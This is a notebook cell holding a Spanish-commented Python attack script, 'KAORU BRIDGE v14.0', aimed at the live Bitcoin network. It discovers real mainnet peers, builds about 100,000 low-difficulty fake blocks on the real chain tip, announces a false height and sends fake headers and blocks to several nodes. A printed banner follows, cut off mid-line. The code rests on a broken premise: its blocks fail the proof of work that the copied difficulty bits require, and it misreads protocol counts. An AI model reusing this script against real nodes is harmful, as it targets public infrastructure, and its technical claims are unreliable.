In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v14.0 - CHAIN EXTENSION ATTACK
En lugar de reemplazar la cadena, la EXTENDEMOS
con 1 millón de bloques ADICIONALES
"""

import hashlib
import struct
import socket
import time
import random
import select
from typing import List, Tuple, Dict
from dataclasses import dataclass
from collections import defaultdict
from datetime import datetime

@dataclass
class BlockHeader:
    version: int
    prev_hash: bytes
    merkle_root: bytes
    timestamp: int
    bits: int
    nonce: int

    def serialize(self) -> bytes:
        return (struct.pack('<I', self.version) + self.prev_hash +
                self.merkle_root + struct.pack('<I', self.timestamp) +
                struct.pack('<I', self.bits) + struct.pack('<I', self.nonce))

    def hash(self) -> bytes:
        return hashlib.sha256(hashlib.sha256(self.serialize()).digest()).digest()

    def hash_hex(self) -> str:
        return self.hash()[::-1].hex()


class KaoruBridgeV14:
    """
    v14.0 - CHAIN EXTENSION ATTACK

    Estrategia:
    1. Obtener el tip REAL de la red
    2. Construir 1 millón de bloques que CONTINÚAN desde ese tip
    3. Anunciar altura = tip_real + 1,000,000
    4. Los nodos creerán que estamos MUY adelante
    """

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_BLOCK = 2

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.real_tip_header: bytes = None
        self.real_tip_hash: bytes = None
        self.real_height: int = 0
        self.chain_headers: List[bytes] = []
        self.chain_hashes: List[bytes] = []
        self.stats = defaultdict(int)

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    def log(self, msg: str):
        t = datetime.now().strftime("%H:%M:%S")
        print(f"   [{t}] {msg}")

    def msg(self, cmd: str, payload: bytes) -> bytes:
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip: str, height: int) -> bytes:
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', 8333)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', 8333)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x16/KaoruExtension:14.0/'
        p += struct.pack('<i', height)
        p += b'\x01'
        return p

    def parse_msgs(self, data: bytes) -> List[Tuple[str, bytes]]:
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def recv_all(self, sock, timeout=5.0):
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(262144)
                    if chunk:
                        data += chunk
            except:
                break
        sock.setblocking(True)
        return data

    # ============================================
    # OBTENER TIP REAL
    # ============================================

    def get_real_tip(self, ip: str) -> bool:
        """Obtiene el tip real sincronizando headers."""

        self.log(f"🔗 Conectando a {ip} para obtener tip real...")

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(30)
            sock.connect((ip, 8333))

            sock.send(self.msg('version', self.version_payload(ip, 0)))
            time.sleep(0.5)

            data = self.recv_all(sock, 3.0)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'version':
                    if len(payload) >= 85:
                        self.real_height = struct.unpack('<i', payload[81:85])[0]
                        if self.real_height < 0 or self.real_height > 2000000:
                            self.real_height = 875000
                        self.log(f"   Peer altura: {self.real_height:,}")
                    sock.send(self.msg('verack', b''))
                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            # Pedir headers
            genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]

            getheaders = struct.pack('<I', 70016) + b'\x01' + genesis + bytes(32)
            sock.send(self.msg('getheaders', getheaders))

            current_tip = genesis
            total = 0

            self.log(f"   Sincronizando headers (necesitamos ~{self.real_height:,})...")

            while total < self.real_height:
                data = self.recv_all(sock, 10.0)

                if not data:
                    break

                for cmd, payload in self.parse_msgs(data):
                    if cmd == 'headers':
                        if not payload:
                            continue
                        count = payload[0]
                        if count == 0:
                            break

                        offset = 1
                        last_header = None

                        for _ in range(count):
                            if offset + 81 > len(payload):
                                break
                            header = payload[offset:offset+80]
                            current_tip = self.double_sha256(header)
                            last_header = header
                            offset += 81
                            total += 1

                        if total % 50000 == 0:
                            self.log(f"   📊 {total:,}/{self.real_height:,} headers ({total*100//self.real_height}%)")

                        if count < 2000:
                            self.real_tip_header = last_header
                            self.real_tip_hash = current_tip
                            break

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                if self.real_tip_header:
                    break

                # Pedir más
                getheaders = struct.pack('<I', 70016) + b'\x01' + current_tip + bytes(32)
                sock.send(self.msg('getheaders', getheaders))

            sock.close()

            if self.real_tip_header:
                self.log(f"   ✅ Tip real obtenido!")
                self.log(f"   Hash: {self.real_tip_hash[::-1].hex()[:48]}...")
                self.log(f"   Altura: ~{total:,}")
                self.real_height = total
                return True

            return False

        except Exception as e:
            self.log(f"   ❌ Error: {e}")
            return False

    # ============================================
    # CONSTRUIR EXTENSIÓN
    # ============================================

    def build_extension(self, num_blocks: int, target_zeros: int = 2):
        """Construye bloques que EXTIENDEN la cadena real."""

        self.log(f"⛏️ Construyendo {num_blocks:,} bloques desde altura {self.real_height:,}...")

        prev_hash = self.real_tip_hash
        prev_bits = struct.unpack('<I', self.real_tip_header[72:76])[0]

        target = "0" * target_zeros
        start = time.time()

        for i in range(num_blocks):
            merkle = self.double_sha256(f"KAORU_EXT_{self.real_height + i + 1}".encode())

            header = (
                struct.pack('<I', 0x20000000) +
                prev_hash +
                merkle +
                struct.pack('<I', int(time.time())) +
                struct.pack('<I', prev_bits) +  # Misma dificultad
                struct.pack('<I', 0)
            )

            for nonce in range(0xFFFFFFFF):
                h = header[:76] + struct.pack('<I', nonce)
                block_hash = self.double_sha256(h)

                if block_hash[::-1].hex().startswith(target):
                    self.chain_headers.append(h)
                    self.chain_hashes.append(block_hash)
                    prev_hash = block_hash
                    break

            if (i + 1) % 10000 == 0:
                elapsed = time.time() - start
                rate = (i + 1) / elapsed
                eta = (num_blocks - i - 1) / rate
                self.log(f"   ⛏️ {i+1:,}/{num_blocks:,} ({(i+1)*100//num_blocks}%) | {rate:.0f}/s | ETA: {eta/60:.1f}m")

        elapsed = time.time() - start
        self.log(f"   ✅ {len(self.chain_headers):,} bloques en {elapsed:.1f}s")

        return len(self.chain_headers)

    # ============================================
    # PROPAGACIÓN
    # ============================================

    def propagate(self, ip: str, duration: int = 120) -> Dict:
        result = {
            'ip': ip,
            'connected': False,
            'headers_sent': 0,
            'getdata_received': False,
            'blocks_sent': 0
        }

        total_height = self.real_height + len(self.chain_headers)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, 8333))
            result['connected'] = True

            self.log(f"🔗 Conectado a {ip}")
            self.log(f"📤 Anunciando altura: {total_height:,} (real: {self.real_height:,} + nuestros: {len(self.chain_headers):,})")

            sock.send(self.msg('version', self.version_payload(ip, total_height)))

            start = time.time()
            inv_sent = False

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)

                if not data:
                    time.sleep(0.2)
                    continue

                for cmd, payload in self.parse_msgs(data):

                    if cmd == 'version':
                        self.log(f"📥 VERSION")
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        self.log(f"📥 VERACK ✓")

                        if not inv_sent:
                            # Anunciar últimos bloques
                            n = min(50, len(self.chain_headers))
                            inv = bytes([n])
                            for i in range(-n, 0):
                                inv += struct.pack('<I', self.MSG_BLOCK)
                                inv += self.chain_hashes[i]
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(f"📤 INV ({n} bloques)")

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'sendcmpct':
                        sock.send(self.msg('sendcmpct', b'\x00' + struct.pack('<Q', 2)))

                    elif cmd == 'getheaders':
                        self.log(f"📥 GETHEADERS ⭐")

                        # Enviar nuestros headers
                        n = min(2000, len(self.chain_headers))
                        headers = bytes([n])
                        for i in range(n):
                            headers += self.chain_headers[i] + b'\x00'

                        sock.send(self.msg('headers', headers))
                        result['headers_sent'] += n
                        self.log(f"📤 HEADERS ({n})")

                    elif cmd == 'getdata':
                        result['getdata_received'] = True
                        self.log(f"📥 GETDATA ⭐⭐⭐")

                        count = payload[0] if payload else 0
                        offset = 1

                        for _ in range(count):
                            if offset + 36 > len(payload):
                                break
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            for i, h in enumerate(self.chain_hashes):
                                if h == inv_hash:
                                    block = self.chain_headers[i]
                                    block += b'\x01'
                                    tx = struct.pack('<I', 1) + b'\x01' + bytes(32)
                                    tx += struct.pack('<I', 0xffffffff) + b'\x04KAOR'
                                    tx += struct.pack('<I', 0xffffffff) + b'\x01'
                                    tx += struct.pack('<Q', 50*10**8)
                                    tx += b'\x19\x76\xa9\x14' + bytes(20) + b'\x88\xac'
                                    tx += struct.pack('<I', 0)
                                    block += tx

                                    sock.send(self.msg('block', block))
                                    result['blocks_sent'] += 1
                                    self.log(f"📤 BLOCK #{self.real_height + i + 1} 📦")
                                    break

                    elif cmd == 'reject':
                        self.log(f"📥 REJECT ❌")

                    elif cmd == 'inv':
                        count = payload[0] if payload else 0
                        self.log(f"📥 INV ({count})")

            sock.close()

        except Exception as e:
            result['error'] = str(e)

        return result

    def discover(self):
        nodes = []
        for seed in ['seed.bitcoin.sipa.be', 'dnsseed.bluematt.me', 'seed.bitcoinstats.com']:
            try:
                nodes.extend(socket.gethostbyname_ex(seed)[2][:10])
            except:
                pass
        random.shuffle(nodes)
        return nodes

    def execute(self, extension_blocks: int = 100000, target_zeros: int = 2,
                num_peers: int = 5, duration: int = 120):

        print(f"""
╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗██╗  ██╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║██║  ██║                           ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║███████║                           ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║╚════██║                           ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║     ██║                           ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝     ╚═╝                           ║
║                                                                                                  ║
║                              ⚔️  CHAIN EXTENSION ATTACK ⚔️                                       ║
║                                                                                                  ║
║                  Extendemos la cadena REAL con {extension_blocks:,} bloques                             ║
║                                                                                                  ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        # FASE 1: Descubrir nodos
        print("=" * 100)
        print("  [FASE 1] 🌐 DESCUBRIMIENTO")
        print("=" * 100 + "\n")

        nodes = self.discover()
        self.log(f"Encontrados: {len(nodes)} nodos")

        # FASE 2: Obtener tip real
        print("\n" + "=" * 100)
        print("  [FASE 2] 🔗 OBTENIENDO TIP REAL DE LA CADENA")
        print("=" * 100 + "\n")

        for ip in nodes[:3]:
            if self.get_real_tip(ip):
                break

        if not self.real_tip_header:
            self.log("❌ No se pudo obtener tip")
            return

        # FASE 3: Construir extensión
        print("\n" + "=" * 100)
        print(f"  [FASE 3] ⛏️  CONSTRUYENDO {extension_blocks:,} BLOQUES DE EXTENSIÓN")
        print("=" * 100 + "\n")

        self.build_extension(extension_blocks, target_zeros)

        # FASE 4: Propagar
        print("\n" + "=" * 100)
        print(f"  [FASE 4] 📡 PROPAGANDO (altura {self.real_height + len(self.chain_headers):,})")
        print("=" * 100 + "\n")

        results = []

        for ip in nodes[:num_peers]:
            print(f"\n   ╔{'═'*70}╗")
            print(f"   ║  📡 {ip:62} ║")
            print(f"   ╠{'═'*70}╣")

            result = self.propagate(ip, duration)
            results.append(result)

            status = "✅ BLOCKS!" if result['blocks_sent'] > 0 else \
                     "⭐ GETDATA!" if result['getdata_received'] else \
                     "📤 HEADERS" if result['headers_sent'] > 0 else "🔗"

            print(f"   ╠{'═'*70}╣")
            print(f"   ║  Headers: {result['headers_sent']:,} | Blocks: {result['blocks_sent']} | {status:32} ║")
            print(f"   ╚{'═'*70}╝")

        # RESULTADOS
        print("\n" + "=" * 100)
        print("                         📊 RESULTADOS")
        print("=" * 100)

        headers = sum(r.get('headers_sent', 0) for r in results)
        getdata = sum(1 for r in results if r.get('getdata_received'))
        blocks = sum(r.get('blocks_sent', 0) for r in results)

        print(f"""
   ╔══════════════════════════════════════════════════════════════════════════════════════════╗
   ║                                                                                          ║
   ║   Cadena real:              {self.real_height:>10,} bloques                                  ║
   ║   Extensión:                {len(self.chain_headers):>10,} bloques                                  ║
   ║   ALTURA TOTAL:             {self.real_height + len(self.chain_headers):>10,} bloques                                  ║
   ║                                                                                          ║
   ║   Headers enviados:         {headers:>10,}                                                  ║
   ║   GETDATA recibidos:        {getdata:>10}                                                  ║
   ║   BLOQUES ENVIADOS:         {blocks:>10}                                                  ║
   ║                                                                                          ║
   ╚══════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        if blocks > 0:
            print("   🎉🎉🎉 ¡¡¡BLOQUES ENVIADOS!!! 🎉🎉🎉")

        print(f"\n   Estado: CHAIN EXTENSION ATTACK COMPLETADO ✅")

        return results


if __name__ == "__main__":
    bridge = KaoruBridgeV14()
    bridge.execute(
        extension_blocks=100000,
        target_zeros=2,
        num_peers=5,
        duration=120
    )


╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗██╗  ██╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║██║  ██║                           ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║███████║                           ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║╚════██║                           ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║     ██║                           ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝     ╚═╝                           ║
║                                                                                                  ║
║                              ⚔️  CHAIN EXTENSION ATTACK ⚔️                              